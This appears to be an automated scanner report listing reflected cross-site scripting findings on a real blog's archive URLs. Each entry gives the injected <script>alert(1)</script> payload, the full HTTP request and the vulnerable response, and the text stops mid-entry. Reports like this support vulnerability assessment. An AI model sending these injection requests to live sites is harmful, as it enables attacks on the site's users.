<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200776aa1<script>alert(1)</script>70d85d884f6/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be509<script>alert(1)</script>31065c5cb7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:06:02 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/11be509<script>alert(1)</script>31065c5cb7d/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22432<script>alert(1)</script>251e4966396 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora22432<script>alert(1)</script>251e4966396/archives/2007/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6520c<script>alert(1)</script>295fc6b8631 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives6520c<script>alert(1)</script>295fc6b8631/2007/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6d8f<script>alert(1)</script>3888aff47e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007a6d8f<script>alert(1)</script>3888aff47e/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3bf47<script>alert(1)</script>c247d05fe1f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2007/123bf47<script>alert(1)</script>c247d05fe1f/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9839c<script>alert(1)</script>cc1f4677e63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9839c<script>alert(1)</script>cc1f4677e63/archives/2008/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c4d9b<script>alert(1)</script>1d7f2c0691b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc4d9b<script>alert(1)</script>1d7f2c0691b/2008/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 59e99<script>alert(1)</script>825e8cfc0de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200859e99<script>alert(1)</script>825e8cfc0de/01/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fe2be<script>alert(1)</script>1f3f48cf5b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/01fe2be<script>alert(1)</script>1f3f48cf5b1/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ac1f<script>alert(1)</script>ef5a796adc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2ac1f<script>alert(1)</script>ef5a796adc4/archives/2008/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34032<script>alert(1)</script>06892156e4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives34032<script>alert(1)</script>06892156e4e/2008/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6411d<script>alert(1)</script>c8b26e3f983 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:53 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20086411d<script>alert(1)</script>c8b26e3f983/02/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e1573<script>alert(1)</script>3b6a99d2827 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/02e1573<script>alert(1)</script>3b6a99d2827/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 172d5<script>alert(1)</script>d6b14e8dbb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:47 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora172d5<script>alert(1)</script>d6b14e8dbb2/archives/2008/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ee2e<script>alert(1)</script>224981c07fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5ee2e<script>alert(1)</script>224981c07fd/2008/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5184f<script>alert(1)</script>5f6e8db7f13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20085184f<script>alert(1)</script>5f6e8db7f13/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload dff11<script>alert(1)</script>9e8c2c2eee5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2008/03dff11<script>alert(1)</script>9e8c2c2eee5/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b984<script>alert(1)</script>5934a17f05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:48 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora8b984<script>alert(1)</script>5934a17f05d/archives/2008/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abb6d<script>alert(1)</script>79106cb9952 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesabb6d<script>alert(1)</script>79106cb9952/2008/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 465a8<script>alert(1)</script>77d6f7cf9b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
